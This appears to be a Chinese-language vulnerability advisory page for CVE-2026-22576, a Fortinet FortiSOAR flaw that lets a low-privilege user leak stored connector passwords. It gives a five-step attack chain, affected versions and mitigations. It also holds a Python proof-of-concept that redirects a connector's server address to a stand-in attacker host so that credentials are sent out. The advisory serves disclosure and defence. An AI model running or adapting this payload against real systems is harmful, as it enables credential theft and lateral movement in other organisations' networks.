CVE-2026-22576 CVSS 4.3 中危

CVE-2026-22576 FortiSOAR密码可恢复信息泄露

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22576

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiSOAR

漏洞概述

Fortinet FortiSOAR在处理连接器配置时存在安全隐患，导致密码以可恢复格式存储。经过身份认证的远程攻击者可以利用该漏洞，通过篡改连接器配置中的服务器地址参数，进而检索并获取系统中多个已安装连接器的密码明文。该漏洞主要影响PaaS及本地部署的特定版本，可能造成横向移动风险。

技术细节

漏洞根源在于FortiSOAR系统对连接器凭证的存储机制存在缺陷，未采用强不可逆加密，而是以可恢复形式保存。攻击者利用此漏洞需具备低权限认证身份。具体利用流程为：攻击者登录系统后，访问连接器配置管理界面或API，找到目标连接器的配置项。利用系统对“服务器地址”参数校验不严的缺陷，攻击者修改该地址。在系统处理配置更新或测试连接的过程中，由于逻辑错误，系统可能会将包含连接器用户名和密码的完整配置数据发送到攻击者指定的地址，或在响应报错信息中回显敏感凭证。这使得攻击者能够窃取其他服务的凭证，进而突破边界进行横向移动。此漏洞属于典型的敏感信息泄露，风险在于凭证复用导致的权限提升。

攻击链分析

STEP 1

1. 获取认证

攻击者使用低权限账户登录FortiSOAR系统。

STEP 2

2. 定位目标

识别系统中配置的目标连接器，准备进行篡改。

STEP 3

3. 修改配置

发送请求修改连接器配置中的服务器地址参数，指向恶意服务器或触发回显。

STEP 4

4. 窃取凭据

系统处理请求时，将连接器的用户名和密码发送至攻击者控制的服务器或直接在响应中泄露。

STEP 5

5. 横向移动

利用获取的凭证访问连接器所关联的其他内部系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-22576 PoC Concept
# Attacker modifies the connector server address to leak credentials

target_url = "https://<fortisoar_host>/api/connector"
attacker_server = "http://attacker-controlled-server.com"

# Headers with authentication cookie/token
headers = {
    "Authorization": "Bearer <valid_token>",
    "Content-Type": "application/json"
}

# Payload manipulating the server address configuration
payload = {
    "connector_id": "<target_connector_id>",
    "configuration": {
        "server_address": attacker_server  # Malicious modification
    }
}

try:
    # Sending request to update configuration
    response = requests.post(target_url, json=payload, headers=headers, verify=False)
    
    # Check if the response contains leaked credentials or if data is sent to attacker_server
    if response.status_code == 200:
        print("[+] Configuration update request sent.")
        print("[+] Check attacker server logs for incoming credentials.")
    else:
        print("[-] Request failed.")
        print(response.text)

except Exception as e:
    print(f"Error: {e}")

影响范围

FortiSOAR PaaS 7.3.0 - 7.3.x

FortiSOAR PaaS 7.4.0 - 7.4.x

FortiSOAR PaaS 7.5.0 - 7.5.2

FortiSOAR PaaS 7.6.0 - 7.6.4

FortiSOAR on-premise 7.3.0 - 7.3.x

FortiSOAR on-premise 7.4.0 - 7.4.x

FortiSOAR on-premise 7.5.0 - 7.5.2

FortiSOAR on-premise 7.6.0 - 7.6.4

防御指南

临时缓解措施

在未升级前，建议管理员严格限制对FortiSOAR系统的网络访问，仅允许必要的管理IP连接。同时，应加强日志监控，重点关注连接器配置的异常修改行为。如果可能，暂时停用非必要的连接器服务以减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-22576
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-22576
3 Details https://www.cvedetails.com/cve/CVE-2026-22576/
4 VulDB https://vuldb.com/cve/CVE-2026-22576
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-26-104

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表